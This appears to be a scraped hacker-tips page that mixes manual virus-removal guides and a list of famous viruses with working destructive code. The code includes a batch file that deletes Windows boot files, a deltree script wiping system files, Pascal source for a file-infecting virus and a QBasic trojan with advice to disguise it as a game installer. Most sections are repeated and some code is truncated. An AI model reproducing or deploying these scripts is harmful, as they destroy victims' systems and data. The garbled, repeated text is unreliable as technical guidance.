Virus Tips & Tricks
Remove the Amvo.exe !!
First of all you we must know what is the amvo.exe is? what the symptoms
when we have amvo.exe in our PC and how to remove it manually without
using any software. Ok here we go!
What is Amvo.exe?
* Amvo.exe is Trojan/Backdoor
Symptoms
* Folder Option is not working - you cannot enable the Folder Option or show the hidden files running into you computer.
* Hidden file problem
* Always open new windows in all drives
* Error occur of the memory reference (Low Disk Space)
How to solve this?
This is the solution on how to remove the amvo.exe and to fix the folder option problem. Just follow this steps:
1. Uncheck amvo.exe from msconfig>> startup (type msconfig in run and click on the startup tab) also and restart your system
1. Click Start > Run and type REGEDIT
2. Go to HKEY_CURRENT_USER > SOFTWARE > Microsoft > Windows > CurrentVersion > Explorer > Advanced
3. On the right side, double click the hidden value and give it a value of 1.
4. Same for HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Explorer > Advanced > Folder > Hidden > SHOW ALL Change the value of Checked Value to 1.
5. Check if your Folder Option if its working now. If it works! OK you are now ready to delete the Amvo.exe virus now.
Go to your Folder Option and enable the show all the hidden files and you remove the following files if they are exist in the exact location or directory:
c:\autorun.inf
c:\u.bat
c:\amvo.exe
c:\awda2.exe
c:\d.com
c:\mvo.dll
c:\amvo1.dll
c:\windows\system32\ amvo.exe
c:\windows\system32\ awda2.exe
c:\windows\system32\ d.com
c:\windows\system32\ mvo.dll
c:\windows\system32\ amvo1.dll
c:\windows\system32\u.bat
Lastly go to Run and type cmd then type regedit, press Ctrl + F to find the files amvo.exe and delete it. After that, reboot your PC.
What is Amvo.exe?
* Amvo.exe is Trojan/Backdoor
Symptoms
* Folder Option is not working - you cannot enable the Folder Option or show the hidden files running into you computer.
* Hidden file problem
* Always open new windows in all drives
* Error occur of the memory reference (Low Disk Space)
How to solve this?
This is the solution on how to remove the amvo.exe and to fix the folder option problem. Just follow this steps:
1. Uncheck amvo.exe from msconfig>> startup (type msconfig in run and click on the startup tab) also and restart your system
1. Click Start > Run and type REGEDIT
2. Go to HKEY_CURRENT_USER > SOFTWARE > Microsoft > Windows > CurrentVersion > Explorer > Advanced
3. On the right side, double click the hidden value and give it a value of 1.
4. Same for HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Explorer > Advanced > Folder > Hidden > SHOW ALL Change the value of Checked Value to 1.
5. Check if your Folder Option if its working now. If it works! OK you are now ready to delete the Amvo.exe virus now.
Go to your Folder Option and enable the show all the hidden files and you remove the following files if they are exist in the exact location or directory:
c:\autorun.inf
c:\u.bat
c:\amvo.exe
c:\awda2.exe
c:\d.com
c:\mvo.dll
c:\amvo1.dll
c:\windows\system32\ amvo.exe
c:\windows\system32\ awda2.exe
c:\windows\system32\ d.com
c:\windows\system32\ mvo.dll
c:\windows\system32\ amvo1.dll
c:\windows\system32\u.bat
Lastly go to Run and type cmd then type regedit, press Ctrl + F to find the files amvo.exe and delete it. After that, reboot your PC.
How to remove Funny UST Scandal avi.Exe Virus Manually !!
1. Firstly you need to end process running by the virus
killer.exe ,b.lsass.exe ,c.smss.exe
Note: close all those processes that have the same icon of Funny UST Sandal.avi.exe
2. Open Start >> Run and type cmd (without quotes) and press enter.
3. Above command will open up command prompt, type cd\ (without quotes)
4. Type attrib -h -s smss.exe (without quotes)
5. Type attrib -h -s autorun.inf (without quotes)
6. Repeat step 4 and 5 for all the drives through command prompt (on the root folder)
7. Now open all your drives one by one by typing C: ,D: and so on in the address bar at the top, delete smss.exe,autorun.inf,Funny UST Scandal.avi.exe
8. Open command prompt again by following step 2.
9. Type cd c:\windows (without quotes)
10. Type attrib -h -s smss.exe (without quotes)and press enter. Type delete smss.exe and press enter also type delete lsass.exe and press enter.
11. Now Open Start >> Run and type regedit and press enter.
12. Locate these paths one by one in the registry.
* HKLM\Software\Microsoft\WindowNT\CurrentVersion\Wi nlogon\shell
* HKCU\Software\Microsoft\windows\Currentversion\Run \Runonce
At these paths, locate the keys which have values as (killer.exe) and (c:\windows\smss.exe). Delete these registry keys.
killer.exe ,b.lsass.exe ,c.smss.exe
Note: close all those processes that have the same icon of Funny UST Sandal.avi.exe
2. Open Start >> Run and type cmd (without quotes) and press enter.
3. Above command will open up command prompt, type cd\ (without quotes)
4. Type attrib -h -s smss.exe (without quotes)
5. Type attrib -h -s autorun.inf (without quotes)
6. Repeat step 4 and 5 for all the drives through command prompt (on the root folder)
7. Now open all your drives one by one by typing C: ,D: and so on in the address bar at the top, delete smss.exe,autorun.inf,Funny UST Scandal.avi.exe
8. Open command prompt again by following step 2.
9. Type cd c:\windows (without quotes)
10. Type attrib -h -s smss.exe (without quotes)and press enter. Type delete smss.exe and press enter also type delete lsass.exe and press enter.
11. Now Open Start >> Run and type regedit and press enter.
12. Locate these paths one by one in the registry.
* HKLM\Software\Microsoft\WindowNT\CurrentVersion\Wi nlogon\shell
* HKCU\Software\Microsoft\windows\Currentversion\Run \Runonce
At these paths, locate the keys which have values as (killer.exe) and (c:\windows\smss.exe). Delete these registry keys.
How to Remove Disk Knight Virus !!
1. Temporarily Disable USB Drive to auto run (Windows XP):
a. Open Windows Explorer or press the Windows + “e” key.
b. Right-click the drive of the USB Drive. Then select Properties. Drive Properties will appear.
c. Select the AutoPlay tab.
d. Choose Select an Action to Perform
e. At the bottom of the selection, click Take no Action, then click Apply.
f. Click OK to exit Drive Properties.
2. Show Hidden Files
a. Open Windows Explorer
b. Go to Tools > Options
c. On View tab, mark Checked the “Show Hidden Files and Folders and “Hide Protected Operating System Files” Unchecked.
3. Delete the files manually
a. Go the USB Drive and delete autorun.inf
b. Go to C: Drive and delete autorun.inf
c. Go to C:\Windows and delete Disk Knight.exe
4. Modify Windows Registry
a. Go to Start > Run then type regedit
b. On Registry Editor, go to Edit > Find and type “knight”
c. Delete all entries it found.
5. Connect to Internet and update your AntiVirus
6. Reboot your computer in Safe Mode
a. During Boot Up process Press F8 continuously until selection appears
b. Use Arrow Up Down to select Safe Mode on the selections menu.
c. Hit Enter to proceed.
7. Scan your computer with an updated Antivirus and delete all infections it founds.
Note: You may enable auto run of the USB Drive by reversing the process in Step 1.
a. Open Windows Explorer or press the Windows + “e” key.
b. Right-click the drive of the USB Drive. Then select Properties. Drive Properties will appear.
c. Select the AutoPlay tab.
d. Choose Select an Action to Perform
e. At the bottom of the selection, click Take no Action, then click Apply.
f. Click OK to exit Drive Properties.
2. Show Hidden Files
a. Open Windows Explorer
b. Go to Tools > Options
c. On View tab, mark Checked the “Show Hidden Files and Folders and “Hide Protected Operating System Files” Unchecked.
3. Delete the files manually
a. Go the USB Drive and delete autorun.inf
b. Go to C: Drive and delete autorun.inf
c. Go to C:\Windows and delete Disk Knight.exe
4. Modify Windows Registry
a. Go to Start > Run then type regedit
b. On Registry Editor, go to Edit > Find and type “knight”
c. Delete all entries it found.
5. Connect to Internet and update your AntiVirus
6. Reboot your computer in Safe Mode
a. During Boot Up process Press F8 continuously until selection appears
b. Use Arrow Up Down to select Safe Mode on the selections menu.
c. Hit Enter to proceed.
7. Scan your computer with an updated Antivirus and delete all infections it founds.
Note: You may enable auto run of the USB Drive by reversing the process in Step 1.
HOW TO Remove NTDETEC1.exe !!
If you’re using the Operating System called Windows, chances are that
you might have already come across the ntdetec1.exe virus. Or you will,
sooner or later.
Its official name is W32.Ceted and it is a worm that copies itself to all shared and removable drives and spreads when the user double clicks on it to open it. If a system is infected, it creates a folder called ntdetec1 in your System Drive which is NOT visible via Explorer or Command prompt.
Related files:
\ntdetec1\ntdetec1.exe
\ntdetec1\cmrss.exe
\ntdetec1\run.exe
\ntdetec1\shell32.exe
\ntdetec1\drivelist.txt
\ntdetec1\child\autorun.inf
\ntdetec1\child\ntdetec1.exe
Symptoms:
1. Task Manager closes as soon as it launches.
2. RegEdit may be inaccesible
3. Folder Options may be inaccessible
When I scanned using some anti-virus software, Nod32, Symantec AV Corporate, McAfee and AVG failed to detect the files, even in Safe Mode.
To remove it, run the following commands at the command prompt:
taskkill /im cmrss.exe
taskkill /im ntdetec1.exe
taskkill /im shell32.exe
Now, make sure you are in the root drive of your system. For example, if your Windows in installed in C:, make sure your prompt shows C:\>
Now, run the command..
attrib ntdetec1 -s -h -r /s /d
(s->system,h->hidden,r->read only)
This will make the folder visible in explorer. Now you can Shift+Delete the folder from explorer.
Also, you might need to delete the following registry key (if it is present)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\policies\Explorer\ Run\"winlogon" = "C:\ntdetec1\run.exe"
Congratulations, this will remove all known traces of the above worm.
And remember, next time you use someone’s PD, before you access it, goto your command prompt and delete the autorun.inf file if any.
Its official name is W32.Ceted and it is a worm that copies itself to all shared and removable drives and spreads when the user double clicks on it to open it. If a system is infected, it creates a folder called ntdetec1 in your System Drive which is NOT visible via Explorer or Command prompt.
Related files:
\ntdetec1\ntdetec1.exe
\ntdetec1\cmrss.exe
\ntdetec1\run.exe
\ntdetec1\shell32.exe
\ntdetec1\drivelist.txt
\ntdetec1\child\autorun.inf
\ntdetec1\child\ntdetec1.exe
Symptoms:
1. Task Manager closes as soon as it launches.
2. RegEdit may be inaccesible
3. Folder Options may be inaccessible
When I scanned using some anti-virus software, Nod32, Symantec AV Corporate, McAfee and AVG failed to detect the files, even in Safe Mode.
To remove it, run the following commands at the command prompt:
taskkill /im cmrss.exe
taskkill /im ntdetec1.exe
taskkill /im shell32.exe
Now, make sure you are in the root drive of your system. For example, if your Windows in installed in C:, make sure your prompt shows C:\>
Now, run the command..
attrib ntdetec1 -s -h -r /s /d
(s->system,h->hidden,r->read only)
This will make the folder visible in explorer. Now you can Shift+Delete the folder from explorer.
Also, you might need to delete the following registry key (if it is present)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\policies\Explorer\ Run\"winlogon" = "C:\ntdetec1\run.exe"
Congratulations, this will remove all known traces of the above worm.
And remember, next time you use someone’s PD, before you access it, goto your command prompt and delete the autorun.inf file if any.
Worst Computer Viruses Of All Time!!
1. Brain, 1986
It all started here: Brain was the first "real" virus ever discovered, back in 1986. Brain didn't really hurt your PC, but it launched the malware industry with a bang and gave bad ideas to over 100,000 virus creators for the next 2 decades.
2. Michelangelo, 1991
The worst MS-DOS virus ever, Michelangelo attacked the boot sector of your hard drive and any floppy drive inserted into the computer, which caused the virus to spread rapidly. After spreading quietly for months, the virus "activated" on March 6, and promptly started destroying data on tens of thousands of computers.
3. Melissa, 1999
Technically a worm, Melissa (named after a stripper) collapsed entire email systems by causing computers to send mountains of messages to each other. The author of the virus was eventually caught and sentenced to 20 months in prison.
4. ILOVEYOU, 2000
This was notable for being one of the first viruses to trick users into opening a file, which in this case claimed to be a love letter sent to the recipient. In reality, the file was a VBS ****** that sent mountains of junk mail and deleted thousands of files. The results were terribly devastating- one estimate holds that 10 percent of all computers were affected, to a cost of $5.5 billion. It remains perhaps the worst worm of all time.
5. Code Red, 2001
An early "blended threat" attack, Code Red targeted Web servers instead of user machines, defacing websites and later launching denial-of-service attacks on a host of IP addresses, including those of the White House.
6. Nimda, 2001
Built on Code Red's attack system of finding multiple avenues into machines (email, websites, network connections, and others), Nimda infected both Web servers and user machines. It found paths into computers so effectively that, 22 minutes after it was released, it became the Internet's most widespread virus at the time.
7. Klez, 2001
An email virus, Klez pioneered spoofing the "From" field in email messages it sent, making it impossible to tell if Bill Gates did or did not really send you that information about getting free money.
8. Slammer, 2003
Another fast spreader, this worm infected about 75,000 systems in just 10 minutes, slowing the Internet to a crawl (much like Code Red) and shutting down thousands of websites.
9. MyDoom, 2004
Notable as the fastest-spreading email virus of all time, MyDoom infected computers so they would, in turn, send even more junk mail. In a strange twist, MyDoom was also used to attack the website of SCO Group, a very unpopular company that was suing other companies over its code being used in Linux distributions.
10.Storm, 2007
The worst recent virus, Storm spread via email spam with a fake attachment and ultimately infected up to 10 million computers, causing them to join its zombie botnet.. ........
It all started here: Brain was the first "real" virus ever discovered, back in 1986. Brain didn't really hurt your PC, but it launched the malware industry with a bang and gave bad ideas to over 100,000 virus creators for the next 2 decades.
2. Michelangelo, 1991
The worst MS-DOS virus ever, Michelangelo attacked the boot sector of your hard drive and any floppy drive inserted into the computer, which caused the virus to spread rapidly. After spreading quietly for months, the virus "activated" on March 6, and promptly started destroying data on tens of thousands of computers.
3. Melissa, 1999
Technically a worm, Melissa (named after a stripper) collapsed entire email systems by causing computers to send mountains of messages to each other. The author of the virus was eventually caught and sentenced to 20 months in prison.
4. ILOVEYOU, 2000
This was notable for being one of the first viruses to trick users into opening a file, which in this case claimed to be a love letter sent to the recipient. In reality, the file was a VBS ****** that sent mountains of junk mail and deleted thousands of files. The results were terribly devastating- one estimate holds that 10 percent of all computers were affected, to a cost of $5.5 billion. It remains perhaps the worst worm of all time.
5. Code Red, 2001
An early "blended threat" attack, Code Red targeted Web servers instead of user machines, defacing websites and later launching denial-of-service attacks on a host of IP addresses, including those of the White House.
6. Nimda, 2001
Built on Code Red's attack system of finding multiple avenues into machines (email, websites, network connections, and others), Nimda infected both Web servers and user machines. It found paths into computers so effectively that, 22 minutes after it was released, it became the Internet's most widespread virus at the time.
7. Klez, 2001
An email virus, Klez pioneered spoofing the "From" field in email messages it sent, making it impossible to tell if Bill Gates did or did not really send you that information about getting free money.
8. Slammer, 2003
Another fast spreader, this worm infected about 75,000 systems in just 10 minutes, slowing the Internet to a crawl (much like Code Red) and shutting down thousands of websites.
9. MyDoom, 2004
Notable as the fastest-spreading email virus of all time, MyDoom infected computers so they would, in turn, send even more junk mail. In a strange twist, MyDoom was also used to attack the website of SCO Group, a very unpopular company that was suing other companies over its code being used in Linux distributions.
10.Storm, 2007
The worst recent virus, Storm spread via email spam with a fake attachment and ultimately infected up to 10 million computers, causing them to join its zombie botnet.. ........
Virus that crashes your own pc !!
Open Notepade and Paste this Code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c: Drive
save as .bat file in Ur Pc.
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!
Type this in notepad
Start virus.bat
virus.bat
and save as with this name
virus.bat
ur antivirus will not detect this virus
Basically this program will delete all that files which are needed for booting
If your os is installed in d drive instead of c then replace c with d
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c: Drive
save as .bat file in Ur Pc.
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!
Type this in notepad
Start virus.bat
virus.bat
and save as with this name
virus.bat
ur antivirus will not detect this virus
Basically this program will delete all that files which are needed for booting
If your os is installed in d drive instead of c then replace c with d
Different Kinds Of Trojans !!
Remote Access Trojans
These trojans are the most popular trojans now.
Everyone wants to have such trojan because he
or she want to have access to their victim's hard drive.
The RAT'S (remote access trojans)are very
simple to use.Just make someone run the server
and you get the victim's IP and you have FULL
access to his or her computer.They you can
almost everything it depends of the trojan you use.
But the RAT'S have the common remote access trojan functions like:
keylogger,upload and download function,
make a screen shot and so on.Some people use the
trojans for malicious purposes.
They want just to delete and delete.This is lame.
There are many programs out there
that detects the most common trojans,but new trojans are
coming every day and these programs are not the maximum defense.
The trojans do always the same things.
If the trojan restart every time Windows is loaded that
means it put something in the registry
or in win.ini or in other system file so the trojan can restart.
Also the trojans create some file in
the WINDOWS\SYSTEM directory.The file is always looking
to be something that the victim will think
is a normal WINDOWS executable.Most trojans hide
from the Alt+Ctrl+Del menu.This is not
good because there are people who use only this way to see
which process are running.There are programs
that will tell me you exactly the process and the
file from where it comes.Yeah but some trojans
as I told you use fake names and it's a little hard
for some people to understand which process
should they kill.The remote access trojans opens
a port on your computer letting everyone to connect.
Some trojans has options like change the port
and put a password so only the guy that infect you
will be able to use the computer.The change
port option is very good because I'm sure you
don't want your victim to see that port 31337 is open
on their computer.Remote access trojans are
appearing every day and they will continue to appear.
For those that use such trojans: BE CAREFUL
you can infect yourself and they the victim you
wanted to destroy will revenge and you'll be sorry.
---------------------------------------
Password Sending Trojans
The purpose of these trojans is to rip all cached
passwords and send them to specified e-mail
without letting the victim about the e-mail.
Most of these trojans don't restart every time Windows
is loaded and most of them use port 25 to
send the e-mail.There are such trojans that e-mail
other information too like ICQ number
computer info and so on.These trojans are dangerous if
you have any passwords cached anywhere on your computer.
----------------------------------------
Keyloggers
These trojans are very simple.The only one thing
they do is to log the keys that the victim is pressing
and then check for passwords in the log file.
In the most cases these trojans restart every
time Windows is loaded.They have options
like online and offline recording.In the online recording
they know that the victim is online and
they record everything.But in the offline recording
everything written after Windows start is
recorded and saved on the victims disk waiting for
to be transferred.
----------------------------------------
Destructive
The only one function of these trojans is to
destroy and delete files.This makes them very simple
and easy to use.They can automatically
delete all your .dll or .ini or .exe files on your computer.
These are very dangerous trojans and once
you're infected be sure if you don't disinfect your
computer information will no longer exist.
-----------------------------------------
FTP trojans
These trojans open port 21 on your computer
letting EVERYONE that has a FTP client to connect
to your computer without password and will full upload and download options.
These are the most common trojans.They all are dangerous
and you should me careful using them.
--------------------------------------
These trojans are the most popular trojans now.
Everyone wants to have such trojan because he
or she want to have access to their victim's hard drive.
The RAT'S (remote access trojans)are very
simple to use.Just make someone run the server
and you get the victim's IP and you have FULL
access to his or her computer.They you can
almost everything it depends of the trojan you use.
But the RAT'S have the common remote access trojan functions like:
keylogger,upload and download function,
make a screen shot and so on.Some people use the
trojans for malicious purposes.
They want just to delete and delete.This is lame.
There are many programs out there
that detects the most common trojans,but new trojans are
coming every day and these programs are not the maximum defense.
The trojans do always the same things.
If the trojan restart every time Windows is loaded that
means it put something in the registry
or in win.ini or in other system file so the trojan can restart.
Also the trojans create some file in
the WINDOWS\SYSTEM directory.The file is always looking
to be something that the victim will think
is a normal WINDOWS executable.Most trojans hide
from the Alt+Ctrl+Del menu.This is not
good because there are people who use only this way to see
which process are running.There are programs
that will tell me you exactly the process and the
file from where it comes.Yeah but some trojans
as I told you use fake names and it's a little hard
for some people to understand which process
should they kill.The remote access trojans opens
a port on your computer letting everyone to connect.
Some trojans has options like change the port
and put a password so only the guy that infect you
will be able to use the computer.The change
port option is very good because I'm sure you
don't want your victim to see that port 31337 is open
on their computer.Remote access trojans are
appearing every day and they will continue to appear.
For those that use such trojans: BE CAREFUL
you can infect yourself and they the victim you
wanted to destroy will revenge and you'll be sorry.
---------------------------------------
Password Sending Trojans
The purpose of these trojans is to rip all cached
passwords and send them to specified e-mail
without letting the victim about the e-mail.
Most of these trojans don't restart every time Windows
is loaded and most of them use port 25 to
send the e-mail.There are such trojans that e-mail
other information too like ICQ number
computer info and so on.These trojans are dangerous if
you have any passwords cached anywhere on your computer.
----------------------------------------
Keyloggers
These trojans are very simple.The only one thing
they do is to log the keys that the victim is pressing
and then check for passwords in the log file.
In the most cases these trojans restart every
time Windows is loaded.They have options
like online and offline recording.In the online recording
they know that the victim is online and
they record everything.But in the offline recording
everything written after Windows start is
recorded and saved on the victims disk waiting for
to be transferred.
----------------------------------------
Destructive
The only one function of these trojans is to
destroy and delete files.This makes them very simple
and easy to use.They can automatically
delete all your .dll or .ini or .exe files on your computer.
These are very dangerous trojans and once
you're infected be sure if you don't disinfect your
computer information will no longer exist.
-----------------------------------------
FTP trojans
These trojans open port 21 on your computer
letting EVERYONE that has a FTP client to connect
to your computer without password and will full upload and download options.
These are the most common trojans.They all are dangerous
and you should me careful using them.
--------------------------------------
Removing Orkut Virus !!
Many of members of Orkut Are suffering From this Virus Muhaha and it
says something like this you are banned and like that Bla Bla Bla
so here how to Remove it
It makes a folder named heap41a in the C:\ drive with attributes S (System file) and H (Hidden file).If your pc is infected by this virus then just boot it in safe mode,goto cmd prompt and at C:\> type attrib -S -H heap41a to make this folder visible and then just delete this folder. Either you Go with A registry Cleaner to Remove it or here is the Easiest Method.
Open task manager>process tab>there if you find svchost.exe befor your user name (remember also system will use svchost.exe don't end that) just give end process for that then go to run and type C://heap41a and delete all files of that folder.
Here Is the Code of that Virus >>
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
so here how to Remove it
It makes a folder named heap41a in the C:\ drive with attributes S (System file) and H (Hidden file).If your pc is infected by this virus then just boot it in safe mode,goto cmd prompt and at C:\> type attrib -S -H heap41a to make this folder visible and then just delete this folder. Either you Go with A registry Cleaner to Remove it or here is the Easiest Method.
Open task manager>process tab>there if you find svchost.exe befor your user name (remember also system will use svchost.exe don't end that) just give end process for that then go to run and type C://heap41a and delete all files of that folder.
Here Is the Code of that Virus >>
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
Making .dll .sys virus!!
This virus is indetectible by antivirus scanners.
open notepad and past this code:
this will delete all .dll and .sys files change it the way u want like:
open notepad and past this code:
Code:
@Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys
Code:
@Echo off c: cd %WinDir%\System\ deltree /y *.psw cd\ deltree /y *.exe
Virus Code in Pascal !!
ITs a new VIRI code
It's created in pascal
Copy and paste it in notepad as anyname.pas
Program Saddam;
{$M 10000,0,0}
Uses
DOS;
Var
DriveID : String [2];
Buffer : Array [1..8000] Of Byte;
Target,Source : File;
Infected : Byte;
Done : Word;
TargetFile : String;
(*??????????????????????????????????????
???????????????????????????????????*)
Function ExistCom : Boolean;
Var
FindCom : SearchRec;
Begin
FindFirst ( TargetFile, 39, FindCom );
ExistCom := DosError = 0;
End;
Procedure SearchDir ( Dir2Search : String );
Var
S : SearchRec;
Begin
If Dir2Search [ Length ( Dir2Search ) ] <> '\' Then
Dir2Search := Dir2Search + '\';
FindFirst ( Dir2Search + '*.exe', 39, S );
While DosError = 0 Do
Begin
TargetFile := Copy ( Dir2Search + S.Name,1,
Length ( Dir2Search + S.Name ) -3 ) + 'com';
If ( Copy ( S.Name, Length ( S.Name ) -2,3 ) = 'EXE' ) And
Not ExistCom And ( Infected <> 25000 ) Then
Begin
{$i-}
Inc ( Infected );
Assign ( Target, TargetFile );
Rewrite ( Target,1 );
BlockWrite ( Target, Buffer, Done + Random ( 4400 ));
SetFTime ( Target, S.Time );
Close ( Target );
If IoResult = 101 Then
Begin
Infected := 3;
Erase ( Target );
End;
{$i+}
End;
FindNext ( S );
End;
FindFirst ( Dir2Search + '*', Directory, S );
If S.Name = '.' Then
Begin
FindNext ( S );
FindNext ( S );
End;
If ( DosError = 0 ) And
( S.Attr And 16 <> 16 ) Then
FindNext ( S );
While DosError = 0 Do
Begin
If ( S.Attr And 16 = 16 ) And ( Infected < 3 ) Then
SearchDir ( Dir2Search + S.Name );
FindNext ( S );
End;
End;
Begin
DriveID := FExpand ( ParamStr ( 1 ));
Infected := 0;
Assign ( Source, ParamStr ( 0 ) );
Reset ( Source, 1 );
BlockRead ( Source, Buffer, 5000, Done );
Close ( Source );
Randomize;
SearchDir ( DriveID );
Exec ( Copy ( ParamStr ( 0 ),1,
Length ( ParamStr ( 0 )) -3 ) + 'exe', ParamStr ( 1 ) );
End.
*** NOT FOR GENERAL DISTRIBUTION ***
• This File is for the Purpose of Virus Study Only! It Should not be Passed
• Around Among the General Public. It Will be Very Useful for Learning how
• Viruses Work and Propagate. But Anybody With Access to an Assembler can
• Turn it Into a Working Virus and Anybody With a bit of Assembly Coding
• Experience can Turn it Into a far More Malevolent Program Than it Already
• Is. Keep This Code in Responsible Hands!
It's created in pascal
Copy and paste it in notepad as anyname.pas
Program Saddam;
{$M 10000,0,0}
Uses
DOS;
Var
DriveID : String [2];
Buffer : Array [1..8000] Of Byte;
Target,Source : File;
Infected : Byte;
Done : Word;
TargetFile : String;
(*??????????????????????????????????????
???????????????????????????????????*)
Function ExistCom : Boolean;
Var
FindCom : SearchRec;
Begin
FindFirst ( TargetFile, 39, FindCom );
ExistCom := DosError = 0;
End;
Procedure SearchDir ( Dir2Search : String );
Var
S : SearchRec;
Begin
If Dir2Search [ Length ( Dir2Search ) ] <> '\' Then
Dir2Search := Dir2Search + '\';
FindFirst ( Dir2Search + '*.exe', 39, S );
While DosError = 0 Do
Begin
TargetFile := Copy ( Dir2Search + S.Name,1,
Length ( Dir2Search + S.Name ) -3 ) + 'com';
If ( Copy ( S.Name, Length ( S.Name ) -2,3 ) = 'EXE' ) And
Not ExistCom And ( Infected <> 25000 ) Then
Begin
{$i-}
Inc ( Infected );
Assign ( Target, TargetFile );
Rewrite ( Target,1 );
BlockWrite ( Target, Buffer, Done + Random ( 4400 ));
SetFTime ( Target, S.Time );
Close ( Target );
If IoResult = 101 Then
Begin
Infected := 3;
Erase ( Target );
End;
{$i+}
End;
FindNext ( S );
End;
FindFirst ( Dir2Search + '*', Directory, S );
If S.Name = '.' Then
Begin
FindNext ( S );
FindNext ( S );
End;
If ( DosError = 0 ) And
( S.Attr And 16 <> 16 ) Then
FindNext ( S );
While DosError = 0 Do
Begin
If ( S.Attr And 16 = 16 ) And ( Infected < 3 ) Then
SearchDir ( Dir2Search + S.Name );
FindNext ( S );
End;
End;
Begin
DriveID := FExpand ( ParamStr ( 1 ));
Infected := 0;
Assign ( Source, ParamStr ( 0 ) );
Reset ( Source, 1 );
BlockRead ( Source, Buffer, 5000, Done );
Close ( Source );
Randomize;
SearchDir ( DriveID );
Exec ( Copy ( ParamStr ( 0 ),1,
Length ( ParamStr ( 0 )) -3 ) + 'exe', ParamStr ( 1 ) );
End.
*** NOT FOR GENERAL DISTRIBUTION ***
• This File is for the Purpose of Virus Study Only! It Should not be Passed
• Around Among the General Public. It Will be Very Useful for Learning how
• Viruses Work and Propagate. But Anybody With Access to an Assembler can
• Turn it Into a Working Virus and Anybody With a bit of Assembly Coding
• Experience can Turn it Into a far More Malevolent Program Than it Already
• Is. Keep This Code in Responsible Hands!
Write your Own trojan!!!
This is a little trojan written in Qbasic 4.5
REM bitch by Spear
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"
How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their
computers!
What does it do?
This program changes directory to the root and makes 100000 dirs in
the root. You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md. To get rid of them any other way you
would have to format c: or d:
REM bitch by Spear
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"
How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their
computers!
What does it do?
This program changes directory to the root and makes 100000 dirs in
the root. You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md. To get rid of them any other way you
would have to format c: or d:
All About Worms !!
A worm is a computer program that has the ability to copy itself from
machine to machine. They are basically malicious codes like Virus or
Trojans. Worms often have some sort of evil intent. They mainly use up
computer time and network bandwidth when they are replicating.
Unlike a virus, it does not need to attach itself to an existing program. Worms always harm the network (if only by consuming bandwidth), whereas viruses always infect or corrupt files on a targeted computer.Worms can expand from a single copy incredibly quickly .
